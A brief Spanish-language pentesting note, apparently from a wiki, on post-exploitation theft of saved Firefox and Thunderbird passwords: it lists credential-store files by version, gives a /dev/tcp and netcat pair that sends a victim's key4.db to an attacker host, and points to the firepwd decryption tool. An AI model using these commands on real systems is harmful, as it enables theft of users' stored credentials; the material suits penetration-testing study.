Post-Explotación

Mozilla

Si por ejemplo nos encontraramos en el /home de un usuario una carpeta .mozilla y es el caso de que nos encontramos un los archivos estos archivos:

Para encontrar la ruta en Windows puede por ejemplo en -->

C:\Users\<user>\AppData\Roaming\Mozilla\Firefox\Profiles
Firefox <32 (key3.db, signons.sqlite)
Firefox >=32 (key3.db, logins.json)
Firefox >=58.0.2 (key4.db, logins.json)
Firefox >=75.0 (sha1 pbkdf2 sha256 aes256 cbc used by key4.db, logins.json)
at least Thunderbird 68.7.0, likely other versions

Podríamos utilizar la herramienta firepwd la cuál es una herramienta que se escribió para ilustrar cómo se protegen las contraseñas de Mozilla (Firefox, Thunderbird). utilizando el contenido de los archivos key4.db (o key3.db), logins.json (o signons.sqlite).

Una vez tengamos estos 2 archivos, tenemos que pasárnoslo a nuestra máquina:

Victima

cat < key4.db > /dev/tcp/nuestra-IP/<PUERTO>

Local

nc -lvnp <PUERTO> > key4.db

Ahora solamente deberíamos descargarnos la herramienta y ejecutarla

Tienes que poner los 2 archivos en la misma localización donde ejecutas

python3 firepwd.py

Ejemplo

Last updated